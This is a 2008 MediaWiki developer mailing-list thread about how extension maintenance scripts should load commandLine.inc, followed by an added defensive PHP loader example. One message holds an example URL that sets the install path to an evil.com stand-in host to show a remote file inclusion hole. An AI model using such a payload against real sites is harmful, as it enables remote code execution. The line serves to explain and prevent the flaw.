"Tim Starling" tstarling@wikimedia.org wrote in message news:fung8v$bon$1@ger.gmane.org...
Andrew Garrett wrote:
On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements gmane@kennel17.co.uk wrote:
From an extension writer's point of view, the current situation is to put in a relative require_once() line to commandLine.inc and hope that the file is in the expected place.
global $IP; require_once( "$IP/maintenance/commandLine.inc" );
What am I missing?
Besides not working, that would be an arbitrary remote code execution vulnerability:
http://example.com/w/extensions/TheExtension/updateExtension.php?IP=http://evil.com
$IP is not defined at the point that the script is run. $IP is defined by including commandLine.inc, so you're getting into a bit of a circular scenario there... :-)
A better way to do it is:
require( dirname(__FILE__).'/../../maintenance/commandLine.inc' );
If that path doesn't exist, the sysadmin can create it. Scripts that rely on the working directory being $IP or whatever are really annoying.
That is the current method, which causes problems as detailed in my previous post. To expand on your point, scripts that rely on the extension being in the extensions folder are also annoying.
We provide MediaWiki to our clients via a symlink in their web folder. They have an 'extensions' folder in their home directory where they can add their own extensions (the MW extensions folder is also used for the MW extensions we have enabled globally and which we offer support for). Currently there is no easy way for them to run the maintenance scripts for the extensions they have locally installed without hacking the code to fix the paths.
- Mark Clements (HappyDog)
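
The loading problem discussed in this thread, as an added example that is not part of the original messages and is not MediaWiki's own code: an extension maintenance script that refuses web requests and takes the install path only from the process environment or from its own location, never from a global that a request parameter could set. `resolveCommandLineInc()` is a hypothetical helper, and using an `MW_INSTALL_PATH` environment variable to let the sysadmin supply the path is an assumption.

```php
<?php
// Added example. resolveCommandLineInc() is a hypothetical helper, not a MediaWiki API.

/**
 * Locate maintenance/commandLine.inc without trusting any request-derived value.
 * Returns the canonical local path, or null if no candidate is usable.
 */
function resolveCommandLineInc( $scriptDir, $envPath ) {
	$candidates = array();

	// 1. Path chosen by the sysadmin via the process environment (assumed
	//    variable name: MW_INSTALL_PATH). This covers extensions that live
	//    outside the MediaWiki tree, e.g. in a user's home directory.
	if ( is_string( $envPath ) && $envPath !== '' ) {
		$candidates[] = $envPath;
	}

	// 2. Default layout: <install path>/extensions/<Name>/<script>.php
	$candidates[] = $scriptDir . '/../..';

	foreach ( $candidates as $base ) {
		// Never hand a URL-style value to require(), whatever its origin.
		if ( strpos( $base, '://' ) !== false ) {
			continue;
		}
		// realpath() only succeeds for an existing local file.
		$file = realpath( $base . '/maintenance/commandLine.inc' );
		if ( $file !== false && is_file( $file ) ) {
			return $file;
		}
	}
	return null;
}

// A maintenance script has no reason to answer HTTP requests at all.
if ( php_sapi_name() !== 'cli' ) {
	header( 'HTTP/1.1 403 Forbidden' );
	exit( 1 );
}

$file = resolveCommandLineInc( dirname( __FILE__ ), getenv( 'MW_INSTALL_PATH' ) );
if ( $file === null ) {
	fwrite( STDERR, "Cannot find maintenance/commandLine.inc; set MW_INSTALL_PATH.\n" );
	exit( 1 );
}
require_once( $file );
```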